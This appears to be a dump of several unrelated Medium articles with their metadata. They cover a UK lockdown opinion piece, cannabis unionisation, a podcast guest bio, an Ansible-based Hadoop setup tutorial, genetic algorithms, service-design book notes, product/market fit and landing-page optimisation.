MPs have raised questions about the new coronavirus strain and Christmas restrictions for weeks. Yet barely more than a day after Parliament went on recess, the Prime Minister delivered a decree so ‘inhuman’, to use his own words, that he had completely ruled it out in the House of Commons. Now, for millions of us, it is a criminal offence to spend time with our families this Christmas.
This is a heinous way to govern a democratic nation. The Prime Minister’s criminalisation of the most important family celebration of the year, reversing promises he just made in the House of Commons at the drop of a hat, leaves him with barely a shred of democratic legitimacy. This reckless manner of rule-making over the minutiae of our family lives is incompatible with any reasonable notion of a democratic social contract. It is, frankly, more characteristic of social control.
Mr Johnson seems unmoved as he adopts the role of Britain’s most authoritarian Prime Minister in modern history. In fact, he now has form for announcing the most difficult decisions at times that undermine or simply evade parliamentary scrutiny. The first national lockdown law in March was imposed one day after Parliament went on recess. The second national lockdown was announced to the nation, as though it were law, two days before Parliament returned from recess. And now, much of the country has been plunged into a third lockdown, as soon as MPs left for the Christmas recess.
In the wake of the Prime Minister ushering in the most extraordinary infringement on citizens’ right to a private and family life on the brink of Christmas, what can MPs — who were elected to make, amend and scrutinise legislation — actually do? Merely tweet their concerns? Do they share responsibility for the millions of pounds of perishable products squandered in the lorries at Dover? How will they respond to the panicked emails from constituents, many of whom are continuing to work? I hope they get more than an out of office reply. Because liberty, lives and livelihoods are being lost in this democratic void.
Plenty of MPs are calling for Parliament to be recalled, but they have no real power in this regard. Only Ministers can request to the Speaker that parliament returns. Even if Parliament were recalled, London’s Tier 4 restrictions (that MPs have not had a chance to vote on) would cause many to stay at home in their constituencies. The law only permits you to go to work if it is not reasonably possible to work from home. It is possible for MPs to work from home — Members of the House of Lords have been working under remote procedures for months — but the Government will not allow it in the Commons. The Leader of the House, Jacob Rees-Mogg, has maintained tough restrictions on remote participation in legislative votes and debates in the Commons. It is extraordinary that the Chamber should be empty at this moment in our nation’s history.
This year has put the cracks in our parliamentary democracy under uncomfortable pressure. The more Ministers use urgent procedures to make laws without parliament — even laws that suspend the population’s liberties — the more one wonders if the architecture of our democracy is already caving in.
It is not that I believe MPs will launch a democratic rebellion — at least not one that will win. The Opposition is more or less furloughed; their Leader is like a zealous Deputy Manager hoping to get the top job if he toes the Government’s line and promises to “deliver” better. MPs seem to be in the kind of stasis we saw in the lead up to the war against Iraq. Over 400 MPs voted for that illegal war — many gripped by crisis, abdicating analytical and moral responsibility, uncritically “following the intelligence”. Between the media clamour, the international pressure and the intelligence agencies, there was an overwhelming push for war. Here we are again. Merely “following the science”, floating in the tide of a media clamour, international pressure and health authorities.
How many MPs would have been so cynical as to believe that the “facts were being fixed around the policy”, as the former head of MI6 said in the run up to the war? And how many MPs today are so cynical as to think the “figures are being chosen to support the policy, rather than the policy being based on the figures”, as Theresa May remarkably said in the Commons — or that “overblown rhetoric” was being used, as Chris Whitty himself put it? Belief in authority is so often blind.
We cannot make the mistake of assuming that our democracy will return to perfect form as soon as the stress is released, simply like a mechanical spring. History tells a different story. It is not the case that mass vaccinations will return the country to “normal”. The muscle memory Britain has acquired for lockdowns, shock and awe law-making and rule by decree cannot be entirely unlearned. Despite 2020 being the year of taking back control and “recapturing sovereignty,” as Mr Johnson put it, Parliamentary sovereignty is crumbling with every dreadful diktat he issues from that lectern.
Let us at least, in this swansong of democracy, go through the sombre motions. For the MPs who do understand the seriousness of what is happening to our country, and railed against Government imposing new national restrictions without parliamentary involvement, their red lines have been crossed yet again. If criminalising family gatherings at Christmas in this way does not spark a democratic rebellion in Parliament, I do not know what will. But how would we know? The gift of recalling Parliament is in Government’s hands and it does not seem to be one they will give us this merry “little” Christmas. Surely then, there are no more red lines to cross.
|
https://medium.com/@silkiecarlo/british-democracy-is-caving-in-on-itself-merry-christmas-76a783032d75
|
['Silkie Carlo']
|
2020-12-22 14:35:37.003000+00:00
|
['Democracy', 'Lockdown', 'Christmas', 'Boris Johnson']
|
Emily Hicks
|
Emily Hicks
President and Co-Founder, FREDsense
Emily Hicks is President of FREDsense, a Calgary, Canada based biotechnology startup focused on the measurement of water quality. Emily co-founded the company with CEO David Lloyd in 2013. FRED stands for Field Ready Electrochemical Detector, which is the product that Emily — along with her FREDsense colleagues — invented, developed and brought to market. It’s used to detect trace amounts of chemicals in water using a groundbreaking new approach based on biologically engineered bacteria.
Her studies in biomedical sciences at the U of C eventually led her to work on the technology on which FREDsense is based. She is a named inventor in the 2013 patent related to that work.
Emily’s wide variety of accolades includes selection as a Kairos Society Fellow, one of the Top 30 Under 30 in sustainability in Canada, the 2014 National Nicol Award, and the Parlee McLaws Females in Energy Scholarship, amongst many other honors.
Emily Hicks is a passionate scientist and entrepreneur. In our wide ranging interview, she not only eloquently explains the FREDsense technology in terms we can all understand but also the pleasures and pitfalls of the entrepreneurial life. It’s a candid discussion for which the answer to at least some of the questions will come as a surprise to our listeners.
Our interview with Emily was recorded live at the INVENTURE$ conference in Calgary, in June of 2018.
|
https://medium.com/the-worknotwork-show/emily-hicks-5c3196bd14d2
|
['Terence C. Gannon']
|
2019-03-23 01:44:19.121000+00:00
|
['Biotechnology', 'Startup', 'Podcast', 'Interview', 'Water']
|
The Labor Day After
|
The Labor Day After
by Carl Fillichio, Vice President at Weedmaps
Tuesday morning quarterbacking Labor Day 2021 media coverage:
The New York Times ran a lengthy and riveting opinion piece (“Let’s Honor True Spirit of Labor Day With a Union Revival”) exploring how American history often ignored the labor movement’s bloody struggle for human dignity. . . . while the New York Post’s editorial board explained “why most Americans no longer honor unions on Labor Day.” CNET revealed “the curious truth about Labor Day’s origins” . . . while National Public Radio just explained “why we celebrate it.” USA Today posted the stores and restaurants that were open yesterday. And on Fox News, Callista and Newt Gingrich shared what COVID taught us about American workers. All-in-all, a pretty normal Labor Day as far as news goes.
Scratch that. “There’s nothing normal about Labor Day 2021,” warned US News & World Reports.
Oddly absent from the Labor Day news coverage and editorializing was cannabis — and how the nascent legal cannabis industry has become a showcase of organized labor’s impact, evolution and success. Despite its impressive economic value — the legal market is projected to pull in $43 billion by 2025 — cannabis’ exclusion from the Labor Day Hit Parade wasn’t surprising. We saw it first a few months ago, when countless pundits declared the American trade movement dead after Amazon workers in Alabama voted overwhelmingly against forming a union. A blow for unions, certainly, but not enough of a reason to write their obituary. Especially as dozens of wins across the country were gained in the cannabis industry.
At the time of the Amazon election results, POLITICO noted that the cannabis industry is fertile ground for organizing efforts and highlighted workers at cannabis companies in New York and Massachusetts who recently voted to join the United Food and Commercial Workers Union. Forty Sunnyside workers in four different New York dispensaries (Sunnyside is owned by Cresco Labs) and 11 Curaleaf workers in Massachusetts voted for union representation. The designation by Governors from both political parties of cannabis shops in legal states as “essential” businesses during the COVID pandemic pushed workers to unions, as they were concerned for their safety at work. The union representing dispensary workers in Los Angeles for example, made sure dispensaries required masks and restricted in-store interaction.
The timing is certainly ripe for unionization within the industry, as states roll out or expand medical and adult-use programs. Additionally, public support for both unions and cannabis legalization are at record levels. About 10,000 cannabis workers — mostly in retail dispensaries — are represented by the UFCW. Other unions are in it to win it, too, including the Teamsters, representing cannabis workers in agriculture, cultivation and retail. The United Domestic Workers don’t represent cannabis workers per se, but rather home care aides whose patients rely on safe access to cannabis medication.
According to Marijuana Business Daily, union organizing in the cannabis industry has picked up significantly in the past year, in response to issues brought on by the coronavirus pandemic. Traditional "union states" like Illinois, Massachusetts and New Jersey have particularly active campaigns. Cannabis workers join a union for a variety of reasons: health and safety issues, a voice in the workplace, and wage/benefit concerns brought on by an "unbanked" industry. Labor peace agreements and sophisticated organizing efforts are also resulting in unionized cannabis workplaces.
It should come as no surprise that all of this is impacting who is part of the cannabis industry, and who has a say in the industry’s future. The labor movement is taking its seat at the table. In New Jersey for example, Gov. Phil Murphy appointed a UFCW official to the state’s new Cannabis Regulatory Commission, flagging the union’s role in the state’s soon-to-launch adult-use cannabis program.
Unionization is also providing the cannabis industry with a credibility boost and image enhancement. “There’s a lot of people who look down on it because there’s a lot of stigma to it and I think that unionizing cannabis workers will remove a lot of that stigma,” a dispensary worker told VICE earlier this year. Proud to call himself a union guy, he believes the union “solidifies us as a respectable part of the United States’ workforce and a respectable part of the United States economy.”
And ultimately, unions could be the secret ingredient that gets cannabis legalized at the federal level. The most pro-union president in American history isn’t enamored with the idea of legal cannabis. But he might be more open to it if the prodding came from his union friends.
|
https://medium.com/@weedmaps/the-labor-day-after-8f6098e2d102
|
[]
|
2021-09-07 20:54:32.610000+00:00
|
['Unions', 'Labor', 'Marijuana', 'Cannabis', 'Labor Day']
|
Automating Hadoop Cluster Setup Using Ansible
|
What is Ansible?
Ansible is an open-source automation tool, or platform, used for IT tasks such as configuration management, application deployment, intraservice orchestration, and provisioning. Automation is crucial these days, with IT environments that are too complex and often need to scale too quickly for system administrators and developers to keep up if they had to do everything manually. Automation simplifies complex tasks, not just making developers’ jobs more manageable but allowing them to focus attention on other tasks that add value to an organization.
What is Hadoop?
The Hadoop Distributed File System (HDFS) is a distributed file system designed to run on commodity hardware. It has many similarities with existing distributed file systems. However, the differences from other distributed file systems are significant. HDFS is highly fault-tolerant and is designed to be deployed on low-cost hardware.
Ansible Architecture:
Ansible Playbooks:
Ordered lists of tasks, saved so you can run those tasks in that order repeatedly. Playbooks are written in YAML format.
Inventory:
A list of managed nodes. An inventory file is also sometimes called a hostfile. Your inventory can specify information such as the IP address of each managed node.
Control Node:
Any machine with Ansible installed is known as a control node. You can run Ansible commands and playbooks by invoking the ansible or ansible-playbook command from any control node.
Managed Node:
The devices you manage with Ansible. Managed nodes are also sometimes called hosts.
Now let's start the setup of a Hadoop cluster using Ansible.
Steps :
Install Ansible on the control node
pip3 install ansible
yum install sshpass

# To see the version of Ansible installed
ansible --version
Ansible Configuration File
vim /etc/ansible/ansible.cfg
To check connectivity with all Managed Nodes
ansible all -m ping
Playbook:
Playbook for Configuration of NameNode
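The playbooks in the original post are embedded as images. As a rough, hypothetical sketch (module choices, paths, and commands here are my assumptions, not the author's exact playbook), a NameNode playbook might look something like this:

```yaml
# Hypothetical sketch of a NameNode playbook. The author's actual playbook
# was shown as an image; paths, modules, and commands are assumptions.
- hosts: namenode
  tasks:
    - name: Copy core-site.xml pointing at the NameNode address
      template:
        src: core-site.xml.j2
        dest: /etc/hadoop/core-site.xml
    - name: Create the NameNode storage directory
      file:
        path: /nn
        state: directory
    - name: Format the NameNode storage (first run only)
      command: hdfs namenode -format -force
    - name: Start the NameNode daemon
      command: hadoop-daemon.sh start namenode
```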
Running NameNode Playbook
ansible-playbook namenode.yml
Checking that the NameNode service has started on the target node
Playbook for Configuration of DataNode
Running DataNode Playbook
(Due to low RAM and CPU resources, I am using the same VM for the DataNode that I used for the NameNode. To do that, just stop the NameNode service and delete the NameNode folder.)
ansible-playbook datanode.yml
Playbook for Configuration of the Client
Link to Code:
|
https://medium.com/@sarthak3398/automating-hadoop-cluster-setup-using-ansible-687b2f58d7d6
|
['Sarthak Srivastava']
|
2020-12-06 12:27:40.771000+00:00
|
['Ansible', 'Hadoop', 'Automation', 'DevOps', 'Ansible Playbook']
|
Introduction to Genetic Algorithms — Including Example Code
|
A genetic algorithm is a search heuristic that is inspired by Charles Darwin’s theory of natural evolution. This algorithm reflects the process of natural selection where the fittest individuals are selected for reproduction in order to produce offspring of the next generation.
Notion of Natural Selection
The process of natural selection starts with the selection of fittest individuals from a population. They produce offspring which inherit the characteristics of the parents and will be added to the next generation. If parents have better fitness, their offspring will be better than parents and have a better chance at surviving. This process keeps on iterating and at the end, a generation with the fittest individuals will be found.
This notion can be applied for a search problem. We consider a set of solutions for a problem and select the set of best ones out of them.
Five phases are considered in a genetic algorithm.
1. Initial population
2. Fitness function
3. Selection
4. Crossover
5. Mutation
Initial Population
The process begins with a set of individuals which is called a Population. Each individual is a solution to the problem you want to solve.
An individual is characterized by a set of parameters (variables) known as Genes. Genes are joined into a string to form a Chromosome (solution).
In a genetic algorithm, the set of genes of an individual is represented using a string, in terms of an alphabet. Usually, binary values are used (string of 1s and 0s). We say that we encode the genes in a chromosome.
Population, Chromosomes and Genes
Fitness Function
The fitness function determines how fit an individual is (the ability of an individual to compete with other individuals). It gives a fitness score to each individual. The probability that an individual will be selected for reproduction is based on its fitness score.
Selection
The idea of selection phase is to select the fittest individuals and let them pass their genes to the next generation.
Two pairs of individuals (parents) are selected based on their fitness scores. Individuals with high fitness have more chance to be selected for reproduction.
Crossover
Crossover is the most significant phase in a genetic algorithm. For each pair of parents to be mated, a crossover point is chosen at random from within the genes.
For example, consider the crossover point to be 3 as shown below.
Crossover point
Offspring are created by exchanging the genes of parents among themselves until the crossover point is reached.
Exchanging genes among parents
The new offspring are added to the population.
New offspring
Mutation
In certain new offspring formed, some of their genes can be subjected to a mutation with a low random probability. This implies that some of the bits in the bit string can be flipped.
Mutation: Before and After
Mutation occurs to maintain diversity within the population and prevent premature convergence.
Termination
The algorithm terminates if the population has converged (does not produce offspring which are significantly different from the previous generation). Then it is said that the genetic algorithm has provided a set of solutions to our problem.
Comments
The population has a fixed size. As new generations are formed, individuals with least fitness die, providing space for new offspring.
The sequence of phases is repeated to produce individuals in each new generation which are better than the previous generation.
Pseudocode
START
Generate the initial population
Compute fitness
REPEAT
Selection
Crossover
Mutation
Compute fitness
UNTIL population has converged
STOP
Example Implementation in Java
Given below is an example implementation of a genetic algorithm in Java. Feel free to play around with the code.
Given a set of 5 genes, each gene can hold one of the binary values 0 and 1.
The fitness value is calculated as the number of 1s present in the genome. If there are five 1s, then it is having maximum fitness. If there are no 1s, then it has the minimum fitness.
This genetic algorithm tries to maximize the fitness function to provide a population consisting of the fittest individual, i.e. individuals with five 1s.
Note: In this example, after crossover and mutation, the least fit individual is replaced from the new fittest offspring.
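The article's full implementation is in Java; as a complementary, minimal sketch (illustrative only, not the article's code), the same five-gene, count-the-1s setup can be written in Python:

```python
import random

GENOME_LENGTH = 5  # five binary genes, as in the article's example
POP_SIZE = 10

def fitness(chromosome):
    # Fitness is the number of 1s in the genome (max 5).
    return sum(chromosome)

def select_parent(population):
    # Tournament selection: the fitter of two random individuals wins.
    a, b = random.sample(population, 2)
    return a if fitness(a) >= fitness(b) else b

def crossover(p1, p2):
    # Single-point crossover at a random point within the genes.
    point = random.randint(1, GENOME_LENGTH - 1)
    return p1[:point] + p2[point:]

def mutate(chromosome, rate=0.05):
    # Flip each bit with a low probability to maintain diversity.
    return [1 - g if random.random() < rate else g for g in chromosome]

def run(max_generations=200):
    population = [[random.randint(0, 1) for _ in range(GENOME_LENGTH)]
                  for _ in range(POP_SIZE)]
    for _ in range(max_generations):
        best = max(population, key=fitness)
        if fitness(best) == GENOME_LENGTH:
            return best  # converged: an all-1s individual was found
        population = [mutate(crossover(select_parent(population),
                                       select_parent(population)))
                      for _ in range(POP_SIZE)]
    return max(population, key=fitness)
```

Unlike the Java example described above, this sketch does not replace only the least-fit individual; it rebuilds the whole population each generation, which is the more common textbook formulation.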
|
https://towardsdatascience.com/introduction-to-genetic-algorithms-including-example-code-e396e98d8bf3
|
['Vijini Mallawaarachchi']
|
2020-03-01 06:15:40.326000+00:00
|
['Machine Learning', 'Evolutionary Algorithms', 'Computer Science', 'Data Science', 'Genetic Algorithm']
|
Good Services: a bloody good read (Part 3)
|
Good Services by Lou Downe tells you how to design good services that work.
I’m sharing my book notes so that you can enjoy the highlights for now, and hopefully be inspired to go on and buy it.
I’m not on commission. I just think that if you work in a job where you’re responsible for the delivery of services to other humans — you should read this book. It will help you to make your services better.
I am not alone!
The book contains 15 principles, which if followed, will help you to design services that work. Many of the examples in the book are from Lou’s experience of working in UK government organisations.
My notes are personal to me. I’ve noted the things that resonate, or that I want to remember and in places, added my own examples. I recommend you read the book to understand things in more depth and to read Lou’s stories of good and bad service design.
I’ve separated my notes into a three parts.
Part one: pre-service stuff
Part two: during service delivery
Part three: post-service stuff (this one)
15 Principles of Good Service Design
(Principles 1–12 are in parts one and two)
13 — A good service should respond to change quickly
Respond quickly and adaptively to a change in a user’s circumstance and make this change consistently throughout the service.
The most common problem with these less predictable changes is that we don’t expect them to happen at all.
Thriva offers no way for users to change their gender
Thriva tests customers' general health and well-being in the comfort of their own homes. By asking for customers' biological sex, they presumed their gender. They don't offer any way for users to change their gender. This became a problem in 2018, when they sent marketing materials for fertility tests and hormone balances to trans men and women who had identified as female.
Think carefully about what pieces of information you use to anchor the identity of your user. Name, gender, age, location, address and phone number can all change.
What can we do differently?
Work on the assumption that nothing is fixed — make it easy for users to change things about themselves.
Make a list of all the changes that might happen to a user and work out which ones need to be designed for as functionality.
Give users the option of changing their details at the point when it becomes relevant to them (e.g., the NHS in the UK asks patients to confirm their phone number and address details when they make an appointment).
Always give users the ability to share only what they want to share.
14 — A good service clearly explains why a decision has been made
When a decision is made within a service, it should be obvious to a user why this decision has been made and clearly communicated at the point at which it’s made. A user should also be given a route to contest this if they need to.
In an effort to standardise decisions across multiple services, we create policies, processes and scripts to ensure our decisions about users are consistent regardless of who makes them (often codified as algorithms). Yet, what if these algorithms are biased? It’s only over time that we start to notice a pattern.
If decision making isn’t transparent, it means that bad decisions can continue unchecked and unchanged. The harm doesn’t come when an algorithm is given too much power, but when it isn’t explained. Decisions based on policy are often equally as unexplained.
Favourite quotes
We design our services in a way that demands 100% accuracy, and that just isn’t realistic. People and machines make mistakes. With lack of transparency in explaining decision making, it’s impossible for staff to change that decision, and users are left with no understanding of how they might take control of the situation and appeal.
What can we do differently?
Make sure decisions are:
Valid — eliminating bias, conflicts or dead ends
Transparent — to both users and staff
Communicated — at the time it’s made
Capable of appeal — because you won’t always get it right
15 — A good service makes it easy to get human assistance
What differentiates your service is not whether or not it fails, but how it deals with failure when it inevitably happens. Getting access to a real human being who is empowered to make a decision and clearly explain it to you, is a vital part of that recovery.
Research conducted by Government Digital Service in 2014 established that 80% of the cost of government was spent on services. And 60% of that cost was spent on calls and casework. Diving even deeper, those calls and case work were split as follows:
Status checking 43%
How to do something 52%
Complaints 5%
Complex cases 2%
The vast majority of these could be solved with clearer service design. Often, our solution to this is to make it harder to seek human assistance. Have you ever tried to find a phone number for Ebay, Amazon or a high street retailer? But, hiding your phone number just pisses people off.
The balance between human and machine-based interaction will vary depending on the service and factors including complexity, risk profile, value and whether it’s tied to the physical world, e.g., hotel, GP surgery.
If we’re leaving the machines to deal with the simple cases and the humans are reserved for the more complex cases, they will have to be more expert and empowered to make decisions than ever before.
What can we do differently?
Make sure humans are accessible when needed
Use humans / machines proportionately
Empower the humans to make decisions — this means removing organisational boundaries and ensuring that they are experts and multi-skilled.
Consistent with the rest of the service — human decisions must be consistent with other human decisions and those made in other channels.
I hope that you’ve enjoyed my summary of Lou’s book and that I’ve inspired you to go on and take a deeper dive into the book for real.
|
https://medium.com/service-works/good-services-a-bloody-good-read-part-3-1063a8ba218
|
['Jo Carter']
|
2020-04-22 09:23:10.017000+00:00
|
['Human Centered Design', 'Government', 'Design Thinking', 'Service Design']
|
The Request
|
Written by
Almost famous cartoonist who laughs at her own jokes and hopes you will, too.
|
https://marcialiss17.medium.com/the-request-e04360b12bd5
|
[]
|
2020-02-14 14:31:53.329000+00:00
|
['Humor', 'Family', 'Funny', 'Comics', 'Cartoon']
|
Product/Market Fit: What it really means, How to Measure it, and Where to find it
|
Product/Market Fit is a common concept in the startup world. While widely applied in conversations around new high-growth companies, it doesn’t seem to have caught on in the rest of the business world yet.
It deserves to be more widely understood, because it's a useful mental model for the interplay between a business, its products, and its customers. Learning about Product/Market Fit will help you see the world differently, and inspire new ways to create value for your customers and growth for your business.
What is Product-Market Fit?
Because it’s such a new concept, there are a few overlapping definitions of Product-Market Fit. We should start with the definition from Marc Andreesen, who originally coined ‘Product/Market Fit’ in his post “The Only Thing That Matters”:
Product/market fit means being in a good market with a product that can satisfy that market.
This is a rather vague definition, but it’s a start. What Andreesen says gives us a more vivid illustration of what Product/market fit really feels like:
You can always feel when product/market fit isn’t happening. The customers aren’t quite getting value out of the product, word of mouth isn’t spreading, usage isn’t growing that fast, press reviews are kind of “blah”, the sales cycle takes too long, and lots of deals never close. And you can always feel product/market fit when it’s happening. The customers are buying the product just as fast as you can make it — or usage is growing just as fast as you can add more servers. Money from customers is piling up in your company checking account. You’re hiring sales and customer support staff as fast as you can. Reporters are calling because they’ve heard about your hot new thing and they want to talk to you about it.
Marc Andreesen’s post on Product Market Fit is the most-recommended resource ever received on Evergreen. It was sent in separately by 6 people, including 2 Gregs: Greg Meyer, Greg Drach, Nitya Nambisan, Aaron Wolfson, and Jason Evanish.
When your customers spread your product
A complementary definition was found in Principles of Product Design, by Josh Porter, suggested by Tim Harsch. Josh’s idea of the level of dedication and excitement by customers is an indicator of Product/market fit:
Product/market fit is when people sell for you
Product market fit is a funny term, but here’s a concrete way to think about it. When people understand and use your product enough to recognize it’s value that’s a huge win. But when they begin to share their positive experience with others, when you can replicate the experience with every new user who your existing users tell, then you have product market fit on your hands. And when this occurs something magical happens. All of a sudden your customers become your salespeople.
Validation of the Value Hypothesis
The definition that feels the most precise and helpful I found in this post by Andy Rachleff, the CEO of Wealthfront, called Why you Should Find Product-Market Fit Before Sniffing Around for Venture Money. He paraphrases work by Eric Reis and Steve Blank to create this explanation:
A value hypothesis is an attempt to articulate the key assumption that underlies why a customer is likely to use your product. A growth hypothesis represents your best thinking about how you can scale the number of customers attracted to your product or service. Identifying a compelling value hypothesis is what I call finding product/market fit. A value hypothesis addresses both the features and business model required to entice a customer to buy your product.
Worth noting on this definition is that there are likely multiple key assumptions to be validated, across product, pricing, and business models. Thanks to Joe Bayley for recommending this post by Andy Rachleff.
Myths about Product Market Fit
This post by Ben Horowitz called The Revenge of the Fat Guy (in reference to a debate with Fred Wilson), has insight that radically improves understanding of Product/market fit. In it, he outlines 4 common myths:
Myth #1: Product market fit is always a discrete, big bang event
Myth #2: It's patently obvious when you have product market fit
Myth #3: Once you achieve product market fit, you can't lose it
Myth #4: Once you have product-market fit, you don't have to sweat the competition
If the definitions above left room for these myths to take hold — read this post and dispel them, before they cause you and your business harm.
Finding Resonance
Itamar Goldminz, a reader and common contributor to Evergreen wrote this piece that uses the metaphor of resonance from Physics to describe Product-market fit:
A good analogy for finding PMF comes from Physics: finding resonance with your customers and getting on the same wavelength as them. Note that this can be accomplished both by changing your product and by changing your customers (market pivot). Changing your wavelength is a gradual, continuous process (anti-myth #1), you know when you’re close to being on the same wavelength but it’s hard to tell if you’re exactly there (anti-myth #2). Since both your product and your customers constantly change (wavelength), it’s easy to get out of sync again (anti-myth #3) and it’s clear that your actions don’t prevent others from getting on the same wavelength (anti-myth #4).
How to get Product-Market Fit
Knowing that we need to get to Product-Market Fit, and what it means to do so, the obvious question is ‘How?’. There is a unique path for every company (or there is failure), and these ways to look at the problem will help you find your way.
Everything is on the Table
Here is another idea from the godfather of Product/market fit, Marc Andreesen. It explains that everything is a possible lever to move your toward product/market fit, and might be changed in that pursuit.
Do whatever is required to get to product/market fit. Including changing out people, rewriting your product, moving into a different market, telling customers no when you don’t want to, telling customers yes when you don’t want to, raising that fourth round of highly dilutive venture capital — whatever is required. When you get right down to it, you can ignore almost everything else.
Changing teams, markets, products, names, and visions are all reasonable in pursuit of product-market fit. That’s the story of many companies: Instagram, Soylent, Anyperk, Twitter — all radically changed course from their original plan to find Product-market fit.
Talk to your customers
Customer Development is a core skill to developing product-market fit. We’ve created a whole Edition of Evergreen on it, called How to Failure-proof your business with Customer Development.
Product-Market Fit is Everyone’s Job
Every employee in the company should understand that they’re hunting for Product-Market Fit, and expect that it’s going to be a tough journey. It’s not a matter of linear progress — it’s a maze where you spend most of your time lost, never sure if you’re making progress or just eliminating an idea through invalidation. Ryan Holiday has a great comment on this:
Product Market Fit is not some mythical status that happens accidentally. Companies work for it; they crawl toward it. They’re ready to throw out weeks or months of work because the evidence supports that decision. The services as their customers know them now are fundamentally different from what they were at launch — before they had Product Market Fit.
Every member of the team has a role to play in finding it, from those who are building products to those that make strategic decisions or interact with customers.
Today, it is the marketer’s job as much as anyone else’s to make sure Product Market Fit happens. […] But rather than waiting for it to happen magically or assuming that this is some other department’s job, marketers need to contribute to this process. Isolating who your customers are, figuring out their needs, designing a product that will blow their minds — these are marketing decisions, not just development and design choices.
These excellent excerpts come from Ryan Holiday’s course on Growth Hacker Marketing, suggested by Vinish Garg.
All Markets are Not Created Equal
Andrew Chen has an underrated post about how to know when a consumer startup has hit Product/market fit. In it, he outlines what makes a ‘good market’:
- A large number of potential users
- High growth in # of potential users
- Ease of user acquisition
and what the benefits are of targeting a good market:
Leading with a great market helps you execute your product design in a simpler and cleaner way. The reason is that once you’ve picked a big market, you can take the time to figure out some user-centric attributes upon which to compete. The important part here is that you can usually pick some key things in which your product is different, but then default the rest of the product decisions.
Product-market fit means that you’ve found a product and a market that wants it — but if that market is small, cheap, or shrinking… you still won’t have much of a company. Don’t just find a market — find a great market.
How to Measure Product/Market Fit
As management legend Peter Drucker famously said: "What gets measured gets managed" — so how do we measure this concept of Product/Market fit? How do we know if we're getting closer, or if we have it?
This isn't an easy question, and there are no perfect answers, but there are three approximations that can guide your journey to Product/market fit.
Do your Customers Recommend you to Friends?
Net Promoter Score (NPS) is a simple survey, asking customers to rate from 1–10, “How likely are you to recommend _____ to a friend or colleague?” Here’s a basic explanation of the Net Promoter score Metric, and how it is calculated.
A screenshot from Delighted’s Demo.
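As a concrete illustration of the calculation: NPS is conventionally the percentage of promoters (ratings 9–10) minus the percentage of detractors (ratings 0–6). A minimal sketch:

```python
def net_promoter_score(ratings):
    # NPS = % promoters (9-10) minus % detractors (0-6).
    # Passives (7-8) count toward the total but toward neither group.
    if not ratings:
        raise ValueError("need at least one rating")
    promoters = sum(1 for r in ratings if r >= 9)
    detractors = sum(1 for r in ratings if r <= 6)
    return 100 * (promoters - detractors) / len(ratings)
```

So a sample of [10, 9, 8, 6, 3] has two promoters and two detractors out of five responses, for a score of 0.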
Services like Delighted automate the process of collecting and analyzing the data for you. I talked with my friend Caleb Elston, and set you up with a $100 credit to get you started. If you plan to try it, email [email protected] with the subject line “Evergreen sent me” and they’ll take great care of you.
Do customers care if your company died tomorrow?
A complementary question to NPS, which is measuring how many customers love you, is this approach which measures how many customers would be distraught if they couldn’t have your product/service anymore.
This is an effective way to measure your value to them, and approximate the price you could extract or the leverage you have to push growth by asking your users to share or invite their friends.
How would you feel if you could no longer use [product]?
- Very disappointed
- Somewhat disappointed
- Not disappointed (it isn't really that useful)
- N/A — I no longer use [product]
If you find that over 40% of your users are saying that they would be "very disappointed" without your product, there is a great chance you can build sustainable, scalable customer acquisition growth on this "must have" product.
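Sean Ellis's 40% rule of thumb is simple arithmetic on the survey responses. A minimal, illustrative sketch (the string labels are my assumption about how responses are recorded):

```python
def must_have_score(responses):
    # Share (%) of non-"n/a" respondents answering "very disappointed".
    # Response labels are assumed to be lowercase strings from the survey.
    counted = [r for r in responses if r != "n/a"]
    if not counted:
        return 0.0
    very = sum(1 for r in counted if r == "very disappointed")
    return 100 * very / len(counted)
```

A result above 40.0 would suggest a "must have" product by this benchmark.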
This post from Growth Hacker Sean Ellis was suggested by Tyler Hayes, and introduces a tool to send out this question called survey.io.
How Many Customers Leave & How Soon?
Alex Shultz, in his talk in the Lecture series How to Start a Startup at Stanford calls out his definition of Product-Market fit, which is based on churn and user retention:
Look at this curve, ‘percent monthly active’ versus ‘number of days from acquisition’, if you end up with a retention curve that is asymptotic to a line parallel to the X-axis, you have a viable business and you have product market fit for some subset of market.
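One rough way to operationalize "asymptotic to a line parallel to the X-axis" in code is to test whether the tail of the retention series has stopped falling. A hedged sketch (the window and tolerance are arbitrary assumptions, not from the talk):

```python
def retention_has_flattened(retention, window=3, tolerance_pts=1.0):
    # Crude check that the tail of a retention curve has gone flat,
    # i.e. is roughly asymptotic to a horizontal line.
    # `retention` is percent-active per period since acquisition.
    if len(retention) < window + 1:
        return False  # not enough data to judge the tail
    tail = retention[-window:]
    return max(tail) - min(tail) <= tolerance_pts
```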
This may require some context (and some research and math to figure out for your business), so check out this full talk to get the whole story:
This talk was also suggested by Tyler Hayes, who dominates resources for learning how to measure Product/market Fit. You rock, Tyler.
Extra Bonus Presentations
These two presentations, one from Andrew Chen and one from Jason Evanish, get into the process of arriving at Product-Market fit, and are worth clicking through to learn more.
Andrew Chen: Zero to Product/Market Fit Presentation
Jason Evanish: Getting to Product/Market Fit
|
https://medium.com/evergreen-business-weekly/product-market-fit-what-it-really-means-how-to-measure-it-and-where-to-find-it-70e746be907b
|
['Eric Jorgenson']
|
2020-05-06 23:42:25.664000+00:00
|
['Startup', 'Silicon Valley', 'Product Market Fit', 'Entrepreneurship', 'Business Building']
|
What is Landing Page and How to Optimize It
|
Landing pages are a very important part of any website, especially in e-commerce. By optimizing a landing page, you can increase your traffic and conversion rates. Obviously, you'll need to tailor the page to your target audience, but there are some basic marketing guidelines that apply to landing pages across various niches. This article will discuss a complete landing page guide, especially for those of you who have e-commerce websites.
First of all, what is a landing page?
Landing pages, in SEO terms, are pages where visitors "land" or arrive from other sources, such as search engines or social media. Basically, this page needs to be optimized to generate certain reactions and interactions from visitors, such as buying a product, subscribing to a newsletter, or perhaps clicking through to another page on your site.
Of course, there are various ways to help your landing page attract more traffic and deliver marketing value. In this article, however, we will focus primarily on increasing the conversion rate, which affects how many people become interested in your product.
Determine the focus of the landing page
Focus is very important on your landing page because this is where you maximize marketing points such as selling products, offering services, or building a brand image.
Make sure you only have one focal point. If people come to your landing page because they’re looking for the sneakers you offer on your e-commerce site, then optimize this page in a way that guides potential customers to the checkout page.
Determining the focus of a landing page is relatively easy. Find out what people are searching for from the most in-demand keywords. For e-commerce sites, the landing page for a product should focus on the ‘Add to Cart’ button; this trick is also known as a call-to-action. Think carefully about the placement, color, and text used for call-to-action buttons.
Read more about How to Optimize Landing Page for E-commerce in cmlabs blog. Don’t forget to subscribe to get notification for new articles!
|
